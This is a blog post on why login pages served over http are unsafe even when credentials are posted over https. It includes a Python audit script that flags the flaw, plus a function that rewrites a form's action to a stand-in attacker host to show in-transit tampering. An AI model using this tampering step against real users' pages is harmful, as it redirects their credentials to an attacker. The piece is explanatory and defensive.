When SSL Is Not SSL

Troy Hunt has a nice post on SSL and how many sites misuse it. As Hunt says, SSL is not about encryption, or at least not only about encryption: it also tells the browser who it is talking to. The problem Hunt writes about is sites that deliver the login page over http and then post the login credentials over https. The idea is that the credentials travel encrypted, so everything is nice and secure. Often these sites will even display a padlock image on the page to suggest that the login is secure.

The problem, as Hunt explains in detail, is that the user has no way of knowing to whom those encrypted credentials are being sent. With SSL, the user is assured1 that the login screen really came from the site it purports to represent. If the login screen itself is not delivered over SSL (that is, over an https connection), anyone between the user and the site can alter the page in transit, for example by changing the form's action or injecting a script, so the user has no way of knowing where the page came from or where the credentials will go once entered. Posting over https does not help if the https endpoint belongs to the attacker.

Hunt gives real examples of governments exploiting this vulnerability, so we are not talking about a theoretical threat. Sadly, many sites continue to get this wrong, putting their users at risk. That authoritarian governments are exploiting it means it can literally be a matter of life and death. And the cost of fixing it is small: when Google moved Gmail to SSL, the added load was within 1% of existing load, so there really is no excuse for not using SSL at least for login pages.
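To make the point concrete, here is an added example (my own illustration, not code from Hunt's post or from this page) that checks a login page for the anti-pattern and shows why the https form action on an http page is worthless. The page URL, the HTML and the attacker's host are all constructed for the example; the audit flags the scheme of the page itself, because that is what decides whether the form can be trusted.

```python
"""Check a login page for the "http page, https POST" anti-pattern and show
why it fails. Example code added to illustrate the post; it is not Hunt's
code or the page's own. URLs and HTML below are constructed for the example."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample: a login page served over plain HTTP whose form posts
# to HTTPS and which shows a padlock image to reassure the user.
LOGIN_PAGE_URL = "http://www.example.com/login"  # assumed URL
LOGIN_PAGE_HTML = """<html><body>
<img src="/images/padlock.png" alt="secure login">
<form method="post" action="https://secure.example.com/auth">
  <input name="user"> <input name="pass" type="password">
  <input type="submit" value="Log in">
</form>
</body></html>"""


class FormFinder(HTMLParser):
    """Collect each <form>'s action and method and whether it holds a
    password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": a.get("method", "get").lower(),
                             "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None \
                and a.get("type", "").lower() == "password":
            self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_login_page(page_url, html):
    """Return a list of findings for every form on the page that collects a
    password. The decisive check is the scheme of the page itself: a page
    fetched over http could have been altered on the way, so nothing it says
    about where the form posts (including an https action) can be trusted."""
    findings = []
    page_scheme = urlparse(page_url).scheme
    parser = FormFinder()
    parser.feed(html)
    for form in parser.forms:
        if not form["has_password"]:
            continue
        action = urljoin(page_url, form["action"])
        if page_scheme != "https":
            findings.append(
                f"login form delivered over {page_scheme}: the page, and "
                f"therefore its action {action}, is unauthenticated")
        if urlparse(action).scheme != "https":
            findings.append(f"credentials posted in clear text to {action}")
        if form["method"] != "post":
            findings.append(f"credentials sent by {form['method'].upper()}, "
                            f"i.e. in the URL, to {action}")
    return findings


def tamper_in_transit(html, attacker_action):
    """What an on-path attacker can do to an http response: point the form
    at a server they control. The padlock image is left exactly as it was,
    so the page looks no different to the user."""
    return re.sub(r'action="[^"]*"',
                  lambda _: f'action="{attacker_action}"', html)


if __name__ == "__main__":
    for line in audit_login_page(LOGIN_PAGE_URL, LOGIN_PAGE_HTML):
        print("finding:", line)
    evil = tamper_in_transit(LOGIN_PAGE_HTML,
                             "https://login.attacker.example/auth")
    for line in audit_login_page(LOGIN_PAGE_URL, evil):
        print("after tampering:", line)
    print("same page over https:",
          audit_login_page("https://www.example.com/login", LOGIN_PAGE_HTML))
```

Run as is, the audit flags the sample page once (it was delivered over http), the tampered copy is flagged with the attacker's action and still carries its padlock, and the identical HTML audited as an https page produces no findings at all. That last result is the fix Hunt asks for: serve the login page itself over SSL, not just the POST.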

This is a great post and very informative. If you are developing Web sites, you definitely need to know this material. Hunt’s post is a great way to get started.

Footnotes:

1 For various values of “assured.”
